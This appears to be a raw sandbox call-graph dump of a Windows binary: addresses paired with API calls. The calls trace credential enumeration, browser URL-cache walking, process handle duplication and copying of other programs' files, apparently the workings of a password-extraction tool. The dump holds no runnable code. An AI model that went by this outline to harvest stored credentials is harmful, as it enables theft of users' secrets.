403c9c memset memset memset memset memset 38327->38721 38328 44595e memset memset 38332 414c2e 14 API calls 38328->38332 38333 4458f9 38329->38333 38331 445a00 memset memset 38744 414c2e 38331->38744 38340 44599c 38332->38340 38341 40b2cc 27 API calls 38333->38341 38334 44558c 38579 444b06 38334->38579 38335 44557a 38335->38334 38791 4136c0 CoTaskMemFree 38335->38791 38606 403fbe memset memset memset memset memset 38337->38606 38350 40b2cc 27 API calls 38340->38350 38351 445909 38341->38351 38353 4087b3 337 API calls 38342->38353 38344 445bca 38352 445c8b memset memset 38344->38352 38408 445cf0 38344->38408 38345 445b38 memset memset memset 38356 445bd4 38345->38356 38357 445b98 38345->38357 38346 445849 38807 40b1ab free free 38346->38807 38365 4459ac 38350->38365 38362 409d1f 6 API calls 38351->38362 38366 414c2e 14 API calls 38352->38366 38363 445621 38353->38363 38354 445585 38792 41366b FreeLibrary 38354->38792 38355 44589f 38808 40b1ab free free 38355->38808 38360 414c2e 14 API calls 38356->38360 38357->38356 38368 445ba2 38357->38368 38358 40b2cc 27 API calls 38370 445a4f 38358->38370 38373 445be2 38360->38373 38361 403335 38508 4452e5 45 API calls 38361->38508 38376 445919 38362->38376 38793 4454bf 20 API calls 38363->38793 38364 445823 38364->38346 38386 4087b3 337 API calls 38364->38386 38377 409d1f 6 API calls 38365->38377 38378 445cc9 38366->38378 38878 4099c6 wcslen 38368->38878 38369 4456b2 38795 40b1ab free free 38369->38795 38757 409d1f wcslen wcslen 38370->38757 38371->38325 38405 44594a 38371->38405 38384 40b2cc 27 API calls 38373->38384 38374 445d3d 38404 40b2cc 27 API calls 38374->38404 38375 445d88 memset memset memset 38387 414c2e 14 API calls 38375->38387 38809 409b98 GetFileAttributesW 38376->38809 38388 4459bc 38377->38388 38389 409d1f 6 API calls 38378->38389 38379 445879 38379->38355 38390 4087b3 337 API calls 38379->38390 38381 445bb3 38881 445403 memset 38381->38881 38382 445680 38382->38369 38629 4087b3 memset 38382->38629 38393 445bf3 38384->38393 38386->38364 38396 445dde 38387->38396 38874 409b98 GetFileAttributesW 38388->38874 38398 445ce1 38389->38398 38390->38379 38403 409d1f 6 API calls 38393->38403 38394 445928 38394->38405 38810 40b6ef 38394->38810 38406 40b2cc 27 API calls 38396->38406 38898 409b98 GetFileAttributesW 38398->38898 38402 40b2cc 27 API calls 38410 445a94 38402->38410 38412 445c07 38403->38412 38413 445d54 _wcsicmp 38404->38413 38405->38328 38417 4459ed 38405->38417 38416 445def 38406->38416 38407 4459cb 38407->38417 38424 40b6ef 249 API calls 38407->38424 38408->38361 38408->38374 38408->38375 38409 445389 255 API calls 38409->38344 38762 40ae18 38410->38762 38411 44566d 38411->38324 38680 413d4c 38411->38680 38420 445389 255 API calls 38412->38420 38421 445d71 38413->38421 38485 445d67 38413->38485 38415 445665 38794 40b1ab free free 38415->38794 38422 409d1f 6 API calls 38416->38422 38417->38331 38458 445b22 38417->38458 38426 445c17 38420->38426 38899 445093 23 API calls 38421->38899 38429 445e03 38422->38429 38424->38417 38425 4456d8 38431 40b2cc 27 API calls 38425->38431 38432 40b2cc 27 API calls 38426->38432 38428 44563c 38428->38415 38434 4087b3 337 API calls 38428->38434 38900 409b98 GetFileAttributesW 38429->38900 38430 40b6ef 249 API calls 38430->38361 38436 4456e2 38431->38436 38437 445c23 38432->38437 38433 445d83 38433->38361 38434->38428 38796 413fa6 _wcsicmp _wcsicmp 38436->38796 38441 409d1f 6 API calls 38437->38441 38439 445e12 38446 445e6b 38439->38446 38453 40b2cc 27 API calls 38439->38453 38444 445c37 38441->38444 38442 445aa1 38445 445b17 38442->38445 38462 445ab2 memset 38442->38462 38476 409d1f 6 API calls 38442->38476 38769 40add4 38442->38769 38774 445389 38442->38774 38783 40ae51 38442->38783 38443 4456eb 38449 4456fd memset memset memset memset 38443->38449 38450 4457ea 38443->38450 38451 445389 255 API calls 38444->38451 38875 40aebe 38445->38875 38902 445093 23 API calls 38446->38902 38797 409c70 wcscpy wcsrchr 38449->38797 38800 413d29 38450->38800 38457 445c47 38451->38457 38459 445e33 38453->38459 38455 445e7e 38461 445f67 38455->38461 38464 40b2cc 27 API calls 38457->38464 38458->38344 38458->38345 38460 409d1f 6 API calls 38459->38460 38465 445e47 38460->38465 38466 40b2cc 27 API calls 38461->38466 38467 40b2cc 27 API calls 38462->38467 38469 445c53 38464->38469 38901 409b98 GetFileAttributesW 38465->38901 38471 445f73 38466->38471 38467->38442 38468 409c70 2 API calls 38472 44577e 38468->38472 38473 409d1f 6 API calls 38469->38473 38475 409d1f 6 API calls 38471->38475 38477 409c70 2 API calls 38472->38477 38478 445c67 38473->38478 38474 445e56 38474->38446 38482 445e83 memset 38474->38482 38479 445f87 38475->38479 38476->38442 38480 44578d 38477->38480 38481 445389 255 API calls 38478->38481 38905 409b98 GetFileAttributesW 38479->38905 38480->38450 38487 40b2cc 27 API calls 38480->38487 38481->38344 38486 40b2cc 27 API calls 38482->38486 38485->38361 38485->38430 38488 445eab 38486->38488 38489 4457a8 38487->38489 38490 409d1f 6 API calls 38488->38490 38491 409d1f 6 API calls 38489->38491 38492 445ebf 38490->38492 38493 4457b8 38491->38493 38494 40ae18 9 API calls 38492->38494 38799 409b98 GetFileAttributesW 38493->38799 38504 445ef5 38494->38504 38496 4457c7 38496->38450 38497 4087b3 337 API calls 38496->38497 38497->38450 38498 40ae51 9 API calls 38498->38504 38499 445f5c 38500 40aebe FindClose 38499->38500 38500->38461 38501 40add4 2 API calls 38501->38504 38502 40b2cc 27 API calls 38502->38504 38503 409d1f 6 API calls 38503->38504 38504->38498 38504->38499 38504->38501 38504->38502 38504->38503 38506 445f3a 38504->38506 38903 409b98 GetFileAttributesW 38504->38903 38904 445093 23 API calls 38506->38904 38508->38308 38509->38311 38510->38308 38511->38303 38513 40c775 38512->38513 38906 40b1ab free free 38513->38906 38515 40c788 38907 40b1ab free free 38515->38907 38517 40c790 38908 40b1ab free free 38517->38908 38519 40c798 38520 40aa04 free 38519->38520 38521 40c7a0 38520->38521 38909 40c274 memset 38521->38909 38526 40a8ab 9 API calls 38527 40c7c3 38526->38527 38528 40a8ab 9 API calls 38527->38528 38529 40c7d0 38528->38529 38938 40c3c3 38529->38938 38533 40c7e5 38534 40c877 38533->38534 38535 40c86c 38533->38535 38961 40a706 wcslen memcpy 38533->38961 38963 40c634 49 API calls 38533->38963 38542 40bdb0 38534->38542 38964 4053fe 39 API calls 38535->38964 38538 40c813 _wcslwr 38962 40c634 49 API calls 38538->38962 38540 40c829 wcslen 38540->38533 39149 404363 38542->39149 38545 40bf5d 39169 40440c 38545->39169 38547 40bdee 38547->38545 38550 40b2cc 27 API calls 38547->38550 38548 40bddf CredEnumerateW 38548->38547 38551 40be02 wcslen 38550->38551 38551->38545 38558 40be1e 38551->38558 38552 40be26 wcsncmp 38552->38558 38555 40be7d memset 38556 40bea7 memcpy 38555->38556 38555->38558 38557 40bf11 wcschr 38556->38557 38556->38558 38557->38558 38558->38545 38558->38552 38558->38555 38558->38556 38558->38557 38559 40b2cc 27 API calls 38558->38559 38561 40bf43 LocalFree 38558->38561 39172 40bd5d 28 API calls 38558->39172 39173 404423 38558->39173 38560 40bef6 _wcsnicmp 38559->38560 38560->38557 38560->38558 38561->38558 38562 4135f7 39186 4135e0 38562->39186 38565 40b2cc 27 API calls 38566 41360d 38565->38566 38567 40a804 8 API calls 38566->38567 38568 413613 38567->38568 38569 41361b 38568->38569 38570 41363e 38568->38570 38572 40b273 27 API calls 38569->38572 38571 4135e0 FreeLibrary 38570->38571 38573 413643 38571->38573 38574 413625 GetProcAddress 38572->38574 38573->38335 38574->38570 38575 413648 38574->38575 38576 413658 38575->38576 38577 4135e0 FreeLibrary 38575->38577 38576->38335 38578 413666 38577->38578 38578->38335 39189 4449b9 38579->39189 38582 444c1f 38582->38315 38583 4449b9 42 API calls 38585 444b4b 38583->38585 38584 444c15 38586 4449b9 42 API calls 38584->38586 38585->38584 39210 444972 GetVersionExW 38585->39210 38586->38582 38588 444b99 memcmp 38593 444b8c 38588->38593 38589 444c0b 39214 444a85 42 API calls 38589->39214 38593->38588 38593->38589 39211 444aa5 42 API calls 38593->39211 39212 40a7a0 GetVersionExW 38593->39212 39213 444a85 42 API calls 38593->39213 38596 40399d 38595->38596 39215 403a16 38596->39215 38598 403a09 39229 40b1ab free free 38598->39229 38600 4039a3 38600->38598 38604 4039f4 38600->38604 39226 40a02c CreateFileW 38600->39226 38601 403a12 wcsrchr 38601->38322 38604->38598 38605 4099c6 2 API calls 38604->38605 38605->38598 38607 414c2e 14 API calls 38606->38607 38608 404048 38607->38608 38609 414c2e 14 API calls 38608->38609 38610 404056 38609->38610 38611 409d1f 6 API calls 38610->38611 38612 404073 38611->38612 38613 409d1f 6 API calls 38612->38613 38614 40408e 38613->38614 38615 409d1f 6 API calls 38614->38615 38616 4040a6 38615->38616 38617 403af5 20 API calls 38616->38617 38618 4040ba 38617->38618 38619 403af5 20 API calls 38618->38619 38620 4040cb 38619->38620 39256 40414f memset 38620->39256 38622 4040e0 38623 404140 38622->38623 38625 4040ec memset 38622->38625 38627 4099c6 2 API calls 38622->38627 38628 40a8ab 9 API calls 38622->38628 39270 40b1ab free free 38623->39270 38625->38622 38626 404148 38626->38382 38627->38622 38628->38622 39283 40a6e6 WideCharToMultiByte 38629->39283 38631 4087ed 39284 4095d9 memset 38631->39284 38634 408809 memset memset memset memset memset 38635 40b2cc 27 API calls 38634->38635 38636 4088a1 38635->38636 38637 409d1f 6 API calls 38636->38637 38638 4088b1 38637->38638 38639 40b2cc 27 API calls 38638->38639 38640 4088c0 38639->38640 38641 409d1f 6 API calls 38640->38641 38642 4088d0 38641->38642 38643 40b2cc 27 API calls 38642->38643 38644 4088df 38643->38644 38645 409d1f 6 API calls 38644->38645 38646 4088ef 38645->38646 38647 40b2cc 27 API calls 38646->38647 38648 4088fe 38647->38648 38649 409d1f 6 API calls 38648->38649 38650 40890e 38649->38650 38651 40b2cc 27 API calls 38650->38651 38652 40891d 38651->38652 38653 409d1f 6 API calls 38652->38653 38654 40892d 38653->38654 39303 409b98 GetFileAttributesW 38654->39303 38656 40893e 38657 408943 38656->38657 38658 408958 38656->38658 39304 407fdf 75 API calls 38657->39304 39305 409b98 GetFileAttributesW 38658->39305 38661 408964 38662 408969 38661->38662 38663 40897b 38661->38663 39306 4082c7 198 API calls 38662->39306 39307 409b98 GetFileAttributesW 38663->39307 38666 408987 38667 4089a1 38666->38667 38668 40898c 38666->38668 39309 409b98 GetFileAttributesW 38667->39309 39308 408560 29 API calls 38668->39308 38678 408953 38678->38382 38681 40b633 free 38680->38681 38682 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38681->38682 38683 413f00 Process32NextW 38682->38683 38684 413da5 OpenProcess 38683->38684 38685 413f17 CloseHandle 38683->38685 38686 413df3 memset 38684->38686 38690 413eb0 38684->38690 38685->38425 39573 413f27 38686->39573 38688 413ec8 38688->38690 39600 4099f4 malloc memcpy free 38688->39600 38689 413ebf free 38689->38690 38690->38683 38690->38688 38690->38689 38692 413e37 GetModuleHandleW 38694 413e46 GetProcAddress 38692->38694 38695 413e1f 38692->38695 38694->38695 38695->38692 39578 413959 38695->39578 39594 413ca4 38695->39594 38697 413ea2 CloseHandle 38697->38690 38699 414c2e 14 API calls 38698->38699 38700 403eb7 38699->38700 38701 414c2e 14 API calls 38700->38701 38702 403ec5 38701->38702 38703 409d1f 6 API calls 38702->38703 38704 403ee2 38703->38704 38705 409d1f 6 API calls 38704->38705 38706 403efd 38705->38706 38707 409d1f 6 API calls 38706->38707 38708 403f15 38707->38708 38709 403af5 20 API calls 38708->38709 38710 403f29 38709->38710 38711 403af5 20 API calls 38710->38711 38712 403f3a 38711->38712 38713 40414f 33 API calls 38712->38713 38714 403f4f 38713->38714 38715 403faf 38714->38715 38717 403f5b memset 38714->38717 38719 4099c6 2 API calls 38714->38719 38720 40a8ab 9 API calls 38714->38720 39609 40b1ab free free 38715->39609 38717->38714 38718 403fb7 38718->38364 38719->38714 38720->38714 38722 414c2e 14 API calls 38721->38722 38723 403d26 38722->38723 38724 414c2e 14 API calls 38723->38724 38725 403d34 38724->38725 38726 409d1f 6 API calls 38725->38726 38727 403d51 38726->38727 38728 409d1f 6 API calls 38727->38728 38729 403d6c 38728->38729 38730 409d1f 6 API calls 38729->38730 38731 403d84 38730->38731 38732 403af5 20 API calls 38731->38732 38733 403d98 38732->38733 38734 403af5 20 API calls 38733->38734 38735 403da9 38734->38735 38736 40414f 33 API calls 38735->38736 38742 403dbe 38736->38742 38737 403e1e 39610 40b1ab free free 38737->39610 38738 403dca memset 38738->38742 38740 403e26 38740->38379 38741 4099c6 2 API calls 38741->38742 38742->38737 38742->38738 38742->38741 38743 40a8ab 9 API calls 38742->38743 38743->38742 38745 414b81 9 API calls 38744->38745 38746 414c40 38745->38746 38747 414c73 memset 38746->38747 39611 409cea 38746->39611 38751 414c94 38747->38751 38750 414c64 38750->38358 38752 414cf4 wcscpy 38751->38752 39614 414bb0 wcscpy 38751->39614 38752->38750 38754 414cd2 39615 4145ac RegQueryValueExW 38754->39615 38756 414ce9 38756->38752 38758 409d43 wcscpy 38757->38758 38760 409d62 38757->38760 38759 409719 2 API calls 38758->38759 38761 409d51 wcscat 38759->38761 38760->38402 38761->38760 38763 40aebe FindClose 38762->38763 38764 40ae21 38763->38764 38765 4099c6 2 API calls 38764->38765 38766 40ae35 38765->38766 38767 409d1f 6 API calls 38766->38767 38768 40ae49 38767->38768 38768->38442 38770 40ade0 38769->38770 38771 40ae0f 38769->38771 38770->38771 38772 40ade7 wcscmp 38770->38772 38771->38442 38772->38771 38773 40adfe wcscmp 38772->38773 38773->38771 38775 40ae18 9 API calls 38774->38775 38777 4453c4 38775->38777 38776 40ae51 9 API calls 38776->38777 38777->38776 38778 4453f3 38777->38778 38779 40add4 2 API calls 38777->38779 38782 445403 250 API calls 38777->38782 38780 40aebe FindClose 38778->38780 38779->38777 38781 4453fe 38780->38781 38781->38442 38782->38777 38784 40ae7b FindNextFileW 38783->38784 38785 40ae5c FindFirstFileW 38783->38785 38786 40ae94 38784->38786 38787 40ae8f 38784->38787 38785->38786 38789 40aeb6 38786->38789 38790 409d1f 6 API calls 38786->38790 38788 40aebe FindClose 38787->38788 38788->38786 38789->38442 38790->38789 38791->38354 38792->38334 38793->38428 38794->38411 38795->38411 38796->38443 38798 409c89 38797->38798 38798->38468 38799->38496 38801 413d39 38800->38801 38802 413d2f FreeLibrary 38800->38802 38803 40b633 free 38801->38803 38802->38801 38804 413d42 38803->38804 38805 40b633 free 38804->38805 38806 413d4a 38805->38806 38806->38324 38807->38327 38808->38371 38809->38394 38811 44db70 38810->38811 38812 40b6fc memset 38811->38812 38813 409c70 2 API calls 38812->38813 38814 40b732 wcsrchr 38813->38814 38815 40b743 38814->38815 38816 40b746 memset 38814->38816 38815->38816 38817 40b2cc 27 API calls 38816->38817 38818 40b76f 38817->38818 38819 409d1f 6 API calls 38818->38819 38820 40b783 38819->38820 39616 409b98 GetFileAttributesW 38820->39616 38822 40b792 38823 40b7c2 38822->38823 38825 409c70 2 API calls 38822->38825 39617 40bb98 38823->39617 38827 40b7a5 38825->38827 38830 40b2cc 27 API calls 38827->38830 38828 40b837 CloseHandle 38833 40b83e memset 38828->38833 38829 40b817 39651 409a45 GetTempPathW 38829->39651 38831 40b7b2 38830->38831 38834 409d1f 6 API calls 38831->38834 39650 40a6e6 WideCharToMultiByte 38833->39650 38834->38823 38835 40b827 38835->38833 38837 40b866 38838 444432 120 API calls 38837->38838 38839 40b879 38838->38839 38840 40b273 27 API calls 38839->38840 38841 40bad5 38839->38841 38842 40b89a 38840->38842 38843 40b04b ??3@YAXPAX 38841->38843 38844 438552 133 API calls 38842->38844 38845 40baf3 38843->38845 38846 40b8a4 38844->38846 38845->38405 38847 40bacd 38846->38847 38849 4251c4 136 API calls 38846->38849 38848 443d90 110 API calls 38847->38848 38848->38841 38872 40b8b8 38849->38872 38850 40bac6 39663 424f26 122 API calls 38850->39663 38851 40b8bd memset 39654 425413 17 API calls 38851->39654 38854 425413 17 API calls 38854->38872 38857 40a71b MultiByteToWideChar 38857->38872 38858 40a734 MultiByteToWideChar 38858->38872 38861 40b9b5 memcmp 38861->38872 38862 4099c6 2 API calls 38862->38872 38863 404423 37 API calls 38863->38872 38866 4251c4 136 API calls 38866->38872 38867 40bb3e memset memcpy 39664 40a734 MultiByteToWideChar 38867->39664 38869 40bb88 LocalFree 38869->38872 38872->38850 38872->38851 38872->38854 38872->38857 38872->38858 38872->38861 38872->38862 38872->38863 38872->38866 38872->38867 38873 40ba5f memcmp 38872->38873 39655 4253ef 16 API calls 38872->39655 39656 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38872->39656 39657 4253af 17 API calls 38872->39657 39658 4253cf 17 API calls 38872->39658 39659 447280 memset 38872->39659 39660 447960 memset memcpy memcpy memcpy 38872->39660 39661 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38872->39661 39662 447920 memcpy memcpy memcpy 38872->39662 38873->38872 38874->38407 38876 40aed1 38875->38876 38877 40aec7 FindClose 38875->38877 38876->38458 38877->38876 38879 4099d7 38878->38879 38880 4099da memcpy 38878->38880 38879->38880 38880->38381 38882 40b2cc 27 API calls 38881->38882 38883 44543f 38882->38883 38884 409d1f 6 API calls 38883->38884 38885 44544f 38884->38885 39753 409b98 GetFileAttributesW 38885->39753 38887 44545e 38888 445476 38887->38888 38890 40b6ef 249 API calls 38887->38890 38889 40b2cc 27 API calls 38888->38889 38891 445482 38889->38891 38890->38888 38892 409d1f 6 API calls 38891->38892 38893 445492 38892->38893 39754 409b98 GetFileAttributesW 38893->39754 38895 4454a1 38896 4454b9 38895->38896 38897 40b6ef 249 API calls 38895->38897 38896->38409 38897->38896 38898->38408 38899->38433 38900->38439 38901->38474 38902->38455 38903->38504 38904->38504 38905->38485 38906->38515 38907->38517 38908->38519 38910 414c2e 14 API calls 38909->38910 38911 40c2ae 38910->38911 38965 40c1d3 38911->38965 38916 40c3be 38933 40a8ab 38916->38933 38917 40afcf 2 API calls 38918 40c2fd FindFirstUrlCacheEntryW 38917->38918 38919 40c3b6 38918->38919 38920 40c31e wcschr 38918->38920 38921 40b04b ??3@YAXPAX 38919->38921 38922 40c331 38920->38922 38923 40c35e FindNextUrlCacheEntryW 38920->38923 38921->38916 38925 40a8ab 9 API calls 38922->38925 38923->38920 38924 40c373 GetLastError 38923->38924 38926 40c3ad FindCloseUrlCache 38924->38926 38927 40c37e 38924->38927 38928 40c33e wcschr 38925->38928 38926->38919 38929 40afcf 2 API calls 38927->38929 38928->38923 38930 40c34f 38928->38930 38931 40c391 FindNextUrlCacheEntryW 38929->38931 38932 40a8ab 9 API calls 38930->38932 38931->38920 38931->38926 38932->38923 39081 40a97a 38933->39081 38936 40a8cc 38936->38526 39087 40b1ab free free 38938->39087 38940 40c3dd 38941 40b2cc 27 API calls 38940->38941 38942 40c3e7 38941->38942 38943 40c50e 38942->38943 38944 40c3ff 38942->38944 38958 405337 38943->38958 38945 40a9ce 4 API calls 38944->38945 38946 40c418 memset 38945->38946 39088 40aa1d 38946->39088 38949 40c471 38951 40c47a _wcsupr 38949->38951 38950 40c505 38950->38943 39090 40a8d0 7 API calls 38951->39090 38953 40c498 39091 40a8d0 7 API calls 38953->39091 38955 40c4ac memset 38956 40aa1d 38955->38956 38957 40c4e4 RegEnumValueW 38956->38957 38957->38950 38957->38951 39092 405220 38958->39092 38961->38538 38962->38540 38963->38533 38964->38534 38966 40ae18 9 API calls 38965->38966 38972 40c210 38966->38972 38967 40ae51 9 API calls 38967->38972 38968 40c264 38969 40aebe FindClose 38968->38969 38971 40c26f 38969->38971 38970 40add4 2 API calls 38970->38972 38977 40e5ed memset memset 38971->38977 38972->38967 38972->38968 38972->38970 38973 40c231 _wcsicmp 38972->38973 38974 40c1d3 34 API calls 38972->38974 38973->38972 38975 40c248 38973->38975 38974->38972 38990 40c084 21 API calls 38975->38990 38978 414c2e 14 API calls 38977->38978 38979 40e63f 38978->38979 38980 409d1f 6 API calls 38979->38980 38981 40e658 38980->38981 38991 409b98 GetFileAttributesW 38981->38991 38983 40e667 38984 409d1f 6 API calls 38983->38984 38986 40e680 38983->38986 38984->38986 38992 409b98 GetFileAttributesW 38986->38992 38987 40e68f 38988 40c2d8 38987->38988 38993 40e4b2 38987->38993 38988->38916 38988->38917 38990->38972 38991->38983 38992->38987 39014 40e01e 38993->39014 38995 40e593 38996 40e5b0 38995->38996 38997 40e59c DeleteFileW 38995->38997 38998 40b04b ??3@YAXPAX 38996->38998 38997->38996 39000 40e5bb 38998->39000 38999 40e521 38999->38995 39037 40e175 38999->39037 39002 40e5c4 CloseHandle 39000->39002 39003 40e5cc 39000->39003 39002->39003 39005 40b633 free 39003->39005 39004 40e573 39007 40e584 39004->39007 39008 40e57c CloseHandle 39004->39008 39006 40e5db 39005->39006 39010 40b633 free 39006->39010 39080 40b1ab free free 39007->39080 39008->39007 39009 40e540 39009->39004 39057 40e2ab 39009->39057 39012 40e5e3 39010->39012 39012->38988 39015 406214 22 API calls 39014->39015 39016 40e03c 39015->39016 39017 40e16b 39016->39017 39018 40dd85 74 API calls 39016->39018 39017->38999 39019 40e06b 39018->39019 39019->39017 39020 40afcf ??2@YAPAXI ??3@YAXPAX 39019->39020 39021 40e08d OpenProcess 39020->39021 39022 40e0a4 GetCurrentProcess DuplicateHandle 39021->39022 39026 40e152 39021->39026 39023 40e0d0 GetFileSize 39022->39023 39024 40e14a CloseHandle 39022->39024 39027 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 39023->39027 39024->39026 39025 40e160 39029 40b04b ??3@YAXPAX 39025->39029 39026->39025 39028 406214 22 API calls 39026->39028 39030 40e0ea 39027->39030 39028->39025 39029->39017 39031 4096dc CreateFileW 39030->39031 39032 40e0f1 CreateFileMappingW 39031->39032 39033 40e140 CloseHandle CloseHandle 39032->39033 39034 40e10b MapViewOfFile 39032->39034 39033->39024 39035 40e13b CloseHandle 39034->39035 39036 40e11f WriteFile UnmapViewOfFile 39034->39036 39035->39033 39036->39035 39038 40e18c 39037->39038 39039 406b90 11 API calls 39038->39039 39040 40e19f 39039->39040 39041 40e1a7 memset 39040->39041 39042 40e299 39040->39042 39047 40e1e8 39041->39047 39043 4069a3 ??3@YAXPAX free 39042->39043 39044 40e2a4 39043->39044 39044->39009 39045 406e8f 13 API calls 39045->39047 39046 406b53 SetFilePointerEx ReadFile 39046->39047 39047->39045 39047->39046 39048 40dd50 _wcsicmp 39047->39048 39049 40e283 39047->39049 39053 40742e 8 API calls 39047->39053 39054 40aae3 wcslen wcslen _memicmp 39047->39054 39055 40e244 _snwprintf 39047->39055 39048->39047 39050 40e291 39049->39050 39051 40e288 free 39049->39051 39052 40aa04 free 39050->39052 39051->39050 39052->39042 39053->39047 39054->39047 39056 40a8d0 7 API calls 39055->39056 39056->39047 39058 40e2c2 39057->39058 39059 406b90 11 API calls 39058->39059 39070 40e2d3 39059->39070 39060 40e4a0 39061 4069a3 ??3@YAXPAX free 39060->39061 39063 40e4ab 39061->39063 39062 406e8f 13 API calls 39062->39070 39063->39009 39064 406b53 SetFilePointerEx ReadFile 39064->39070 39065 40e489 39066 40aa04 free 39065->39066 39067 40e491 39066->39067 39067->39060 39069 40e497 free 39067->39069 39068 40dd50 _wcsicmp 39068->39070 39069->39060 39070->39060 39070->39062 39070->39064 39070->39065 39070->39068 39071 40dd50 _wcsicmp 39070->39071 39074 40742e 8 API calls 39070->39074 39075 40e3e0 memcpy 39070->39075 39076 40e3fb memcpy 39070->39076 39077 40e3b3 wcschr 39070->39077 39078 40e416 memcpy 39070->39078 39079 40e431 memcpy 39070->39079 39072 40e376 memset 39071->39072 39073 40aa29 6 API calls 39072->39073 39073->39070 39074->39070 39075->39070 39076->39070 39077->39070 39078->39070 39079->39070 39080->38995 39082 40a980 39081->39082 39083 40a995 _wcsicmp 39082->39083 39084 40a99c wcscmp 39082->39084 39085 40a8bb 39082->39085 39083->39082 39084->39082 39085->38936 39086 40a8d0 7 API calls 39085->39086 39086->38936 39087->38940 39089 40aa23 RegEnumValueW 39088->39089 39089->38949 39089->38950 39090->38953 39091->38955 39093 405335 39092->39093 39094 40522a 39092->39094 39093->38533 39095 40b2cc 27 API calls 39094->39095 39096 405234 39095->39096 39097 40a804 8 API calls 39096->39097 39098 40523a 39097->39098 39137 40b273 39098->39137 39100 405248 _mbscpy _mbscat GetProcAddress 39101 40b273 27 API calls 39100->39101 39102 405279 39101->39102 39140 405211 GetProcAddress 39102->39140 39104 405282 39105 40b273 27 API calls 39104->39105 39106 40528f 39105->39106 39141 405211 GetProcAddress 39106->39141 39108 405298 39109 40b273 27 API calls 39108->39109 39110 4052a5 39109->39110 39142 405211 GetProcAddress 39110->39142 39112 4052ae 39113 40b273 27 API calls 39112->39113 39114 4052bb 39113->39114 39143 405211 GetProcAddress 39114->39143 39116 4052c4 39117 40b273 27 API calls 39116->39117 39118 4052d1 39117->39118 39144 405211 GetProcAddress 39118->39144 39120 4052da 39121 40b273 27 API calls 39120->39121 39122 4052e7 39121->39122 39145 405211 GetProcAddress 39122->39145 39124 4052f0 39125 40b273 27 API calls 39124->39125 39126 4052fd 39125->39126 39146 405211 GetProcAddress 39126->39146 39128 405306 39129 40b273 27 API calls 39128->39129 39130 405313 39129->39130 39147 405211 GetProcAddress 39130->39147 39132 40531c 39133 40b273 27 API calls 39132->39133 39134 405329 39133->39134 39148 405211 GetProcAddress 39134->39148 39136 405332 39136->39093 39138 40b58d 27 API calls 39137->39138 39139 40b18c 39138->39139 39139->39100 39140->39104 39141->39108 39142->39112 39143->39116 39144->39120 39145->39124 39146->39128 39147->39132 39148->39136 39150 40440c FreeLibrary 39149->39150 39151 40436d 39150->39151 39152 40a804 8 API calls 39151->39152 39153 404377 39152->39153 39154 404383 39153->39154 39155 404405 39153->39155 39156 40b273 27 API calls 39154->39156 39155->38545 39155->38547 39155->38548 39157 40438d GetProcAddress 39156->39157 39158 40b273 27 API calls 39157->39158 39159 4043a7 GetProcAddress 39158->39159 39160 40b273 27 API calls 39159->39160 39161 4043ba GetProcAddress 39160->39161 39162 40b273 27 API calls 39161->39162 39163 4043ce GetProcAddress 39162->39163 39164 40b273 27 API calls 39163->39164 39165 4043e2 GetProcAddress 39164->39165 39166 4043f1 39165->39166 39167 4043f7 39166->39167 39168 40440c FreeLibrary 39166->39168 39167->39155 39168->39155 39170 404413 FreeLibrary 39169->39170 39171 40441e 39169->39171 39170->39171 39171->38562 39172->38558 39174 40447e 39173->39174 39175 40442e 39173->39175 39174->38558 39176 40b2cc 27 API calls 39175->39176 39177 404438 39176->39177 39178 40a804 8 API calls 39177->39178 39179 40443e 39178->39179 39180 404445 39179->39180 39181 404467 39179->39181 39182 40b273 27 API calls 39180->39182 39181->39174 39184 404475 FreeLibrary 39181->39184 39183 40444f GetProcAddress 39182->39183 39183->39181 39185 404460 39183->39185 39184->39174 39185->39181 39187 4135f6 39186->39187 39188 4135eb FreeLibrary 39186->39188 39187->38565 39188->39187 39190 4449c4 39189->39190 39191 444a52 39189->39191 39192 40b2cc 27 API calls 39190->39192 39191->38582 39191->38583 39193 4449cb 39192->39193 39194 40a804 8 API calls 39193->39194 39195 4449d1 39194->39195 39196 40b273 27 API calls 39195->39196 39197 4449dc GetProcAddress 39196->39197 39198 40b273 27 API calls 39197->39198 39199 4449f3 GetProcAddress 39198->39199 39200 40b273 27 API calls 39199->39200 39201 444a04 GetProcAddress 39200->39201 39202 40b273 27 API calls 39201->39202 39203 444a15 GetProcAddress 39202->39203 39204 40b273 27 API calls 39203->39204 39205 444a26 GetProcAddress 39204->39205 39206 40b273 27 API calls 39205->39206 39207 444a37 GetProcAddress 39206->39207 39208 40b273 27 API calls 39207->39208 39209 444a48 GetProcAddress 39208->39209 39209->39191 39210->38593 39211->38593 39212->38593 39213->38593 39214->38584 39216 403a29 39215->39216 39230 403bed memset memset 39216->39230 39218 403ae7 39243 40b1ab free free 39218->39243 39219 403a3f memset 39223 403a2f 39219->39223 39221 403aef 39221->38600 39222 409d1f 6 API calls 39222->39223 39223->39218 39223->39219 39223->39222 39224 409b98 GetFileAttributesW 39223->39224 39225 40a8d0 7 API calls 39223->39225 39224->39223 39225->39223 39227 40a051 GetFileTime CloseHandle 39226->39227 39228 4039ca CompareFileTime 39226->39228 39227->39228 39228->38600 39229->38601 39231 414c2e 14 API calls 39230->39231 39232 403c38 39231->39232 39233 409719 2 API calls 39232->39233 39234 403c3f wcscat 39233->39234 39235 414c2e 14 API calls 39234->39235 39236 403c61 39235->39236 39237 409719 2 API calls 39236->39237 39238 403c68 wcscat 39237->39238 39244 403af5 39238->39244 39241 403af5 20 API calls 39242 403c95 39241->39242 39242->39223 39243->39221 39245 403b02 39244->39245 39246 40ae18 9 API calls 39245->39246 39255 403b37 39246->39255 39247 403bdb 39249 40aebe FindClose 39247->39249 39248 40add4 wcscmp wcscmp 39248->39255 39250 403be6 39249->39250 39250->39241 39251 40a8d0 7 API calls 39251->39255 39252 40ae18 9 API calls 39252->39255 39253 40ae51 9 API calls 39253->39255 39254 40aebe FindClose 39254->39255 39255->39247 39255->39248 39255->39251 39255->39252 39255->39253 39255->39254 39257 409d1f 6 API calls 39256->39257 39258 404190 39257->39258 39271 409b98 GetFileAttributesW 39258->39271 39260 40419c 39261 4041a7 6 API calls 39260->39261 39262 40435c 39260->39262 39263 40424f 39261->39263 39262->38622 39263->39262 39265 40425e memset 39263->39265 39267 409d1f 6 API calls 39263->39267 39268 40a8ab 9 API calls 39263->39268 39272 414842 39263->39272 39265->39263 39266 404296 wcscpy 39265->39266 39266->39263 39267->39263 39269 4042b6 memset 